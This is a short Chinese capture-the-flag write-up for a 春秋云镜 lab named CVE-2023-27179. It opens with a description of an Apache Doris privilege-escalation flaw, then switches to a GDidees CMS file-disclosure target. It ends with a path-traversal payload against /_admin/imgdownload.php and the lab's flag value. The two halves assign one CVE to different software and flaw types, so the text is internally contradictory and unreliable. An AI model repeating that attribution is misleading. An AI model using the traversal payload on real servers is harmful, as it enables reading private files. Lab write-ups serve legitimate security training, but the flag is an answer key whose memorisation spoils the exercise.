【春秋云镜】CVE-2023-27179

CVE-2023-27179

CVE-2023-27179 是一个影响 Apache Doris 的漏洞。Apache Doris 是一款用于交互式分析的高性能数据库，特别适用于处理大规模的结构化数据。该漏洞属于权限提升漏洞，允许未授权用户以管理员身份执行敏感操作。

具体细节

• 漏洞类型：权限提升漏洞（Privilege Escalation）
• 影响范围：Apache Doris 1.2.0 及之前版本
• 成因：该漏洞的出现是由于权限检查不严格，导致未授权用户可以通过特定接口执行管理员操作。
• 攻击方式：攻击者可以利用此漏洞绕过权限控制，从而执行管理员才能进行的敏感操作，例如修改配置、管理用户等。

影响

成功利用该漏洞的攻击者可以获得更高权限，导致数据库中的敏感数据被泄露、篡改或破坏，进一步威胁系统的安全。

修复建议

• 官方在 Apache Doris 的更新中修复了此漏洞，建议：

• 升级 Apache Doris：更新到最新版，确保版本在 1.2.0 以上。

• 访问控制：限制数据库的访问权限，仅允许可信任的用户和 IP 地址访问数据库。

• 监控异常活动：设置日志监控，及时发现权限异常或可疑操作。

靶标介绍：

GDidees CMS v3.9.1及更低版本被发现存在本地文件泄露漏洞，漏洞通过位于 /_admin/imgdownload.php 的 filename 参数进行利用。

解法一：

1. 用目录扫描工具进行扫描
   
   出现目标路径

2. payload

/_admin/imgdownload.php?filename=../../../../../flag

flag{82565a92-d64c-49c5-87c0-42129440c1aa}